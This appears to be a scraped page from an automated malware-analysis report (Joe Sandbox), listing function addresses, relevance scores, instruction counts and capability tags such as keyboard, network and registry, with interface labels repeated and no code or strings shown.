Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB121CEC Relevance: 7.6, APIs: 5, Instructions: 124keyboardCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB15793C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 262COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB162D20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 169COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1584C0 Relevance: 7.1, APIs: 4, Instructions: 1071COMMONLIBRARYCODE
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB19D750 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50shutdownCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB145BC0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1932F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB151750 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB162F50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110COMMON
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1AE968 Relevance: 3.1, APIs: 2, Instructions: 97networkfileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1595B0 Relevance: 2.9, Strings: 2, Instructions: 378COMMONLIBRARYCODE
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB182BCF Relevance: 1.5, APIs: 1, Instructions: 6COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB14C130 Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB14BEB4 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1358D0 Relevance: .7, Instructions: 692COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB12B390 Relevance: .7, Instructions: 682COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB12B9F0 Relevance: .6, Instructions: 577COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1530DC Relevance: .5, Instructions: 535COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB166DE4 Relevance: .2, Instructions: 194COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1A1A18 Relevance: .1, Instructions: 66COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB15FD20 Relevance: .0, Instructions: 32COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1459C8 Relevance: .0, Instructions: 2COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1CE95C Relevance: 49.7, APIs: 33, Instructions: 231windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1A4F30 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 247COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1CECB4 Relevance: 39.2, APIs: 26, Instructions: 179windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1C6EA0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 268windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB192C10 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 175windowtimeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1D1254 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162windowfileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1A3FD0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 197COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1D0118 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 175windowlibraryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1D03D0 Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1A0D70 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 388COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1A246C Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 281fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1A8BF4 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162timeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1B4F54 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 151windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB18B0C4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117memoryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1C1110 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 371COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1A3268 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 135COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1974B0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 128windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB19D4AC Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 65sleepwindowtimeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB197E64 Relevance: 18.2, APIs: 12, Instructions: 173keyboardCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB18FF44 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 243windowtimeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB19176C Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 226COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB121504 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 163windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1A34E4 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 149COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB18C034 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 124registryshareCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1CAD1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1A3E20 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 97fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB197BA0 Relevance: 16.6, APIs: 11, Instructions: 106keyboardCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1B2A18 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 174networkfileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB15D504 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1976D8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 77windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB18E08C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB19CA98 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59networkCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1D0D7C Relevance: 15.2, APIs: 10, Instructions: 209windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB18F7F4 Relevance: 14.5, APIs: 2, Strings: 6, Instructions: 471COMMON
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1B767C Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 231COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1CA350 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 139windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB18D780 Relevance: 13.6, APIs: 9, Instructions: 54memorythreadCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1D0B24 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 142windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB19A070 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB19AD94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 70windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1BFCC0 Relevance: 12.2, APIs: 8, Instructions: 246registryCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB160BBC Relevance: 10.8, APIs: 7, Instructions: 294COMMONLIBRARYCODE
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1ADBF0 Relevance: 10.6, APIs: 7, Instructions: 137networkCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1B37A8 Relevance: 10.6, APIs: 7, Instructions: 103networkCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1C15C4 Relevance: 10.6, APIs: 7, Instructions: 90registryCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1CAEDC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB19FAFC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65pipeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB19F9EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65pipeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB14A054 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 492COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB19D1F0 Relevance: 9.1, APIs: 6, Instructions: 131filestringCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB12D4CC Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 119COMMON
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB19DA1C Relevance: 9.0, APIs: 6, Instructions: 34windowtimethreadCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB18F378 Relevance: 9.0, APIs: 6, Instructions: 33threadwindowtimeCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB18D868 Relevance: 9.0, APIs: 6, Instructions: 22memorysynchronizationCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1BCDF0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB190EAF Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 187COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB199898 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 127COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB159B18 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 121COMMONLIBRARYCODE
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB19B62C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 95filestringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB18DF3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1AD914 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1C93E8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowlibraryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB149164 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1689B4 Relevance: 7.8, APIs: 5, Instructions: 265COMMONLIBRARYCODE
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB15ED08 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1C0084 Relevance: 7.6, APIs: 5, Instructions: 141registryCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1BD0F8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB162998 Relevance: 7.6, APIs: 5, Instructions: 133COMMONLIBRARYCODE
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB15BA2C Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB18D924 Relevance: 7.6, APIs: 5, Instructions: 91sleepwindowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB15F9D4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB192ED0 Relevance: 7.5, APIs: 5, Instructions: 37windowtimeCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1A0008 Relevance: 7.5, APIs: 5, Instructions: 33synchronizationthreadCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1A6D04 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 308comCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1A5F2C Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 300comCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB160040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 205COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB14B1E8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 150COMMONLIBRARYCODE
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB18EAC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 127windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB15EAA8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1CB454 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1CAB9C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1CB798 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1A4DF8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1CB104 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB18F5CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB19C110 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1BAF20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1B7634 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB126D1C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1C10C8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB126D64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB198B38 Relevance: 6.1, APIs: 4, Instructions: 96keyboardwindowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB198CAC Relevance: 6.1, APIs: 4, Instructions: 89keyboardwindowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
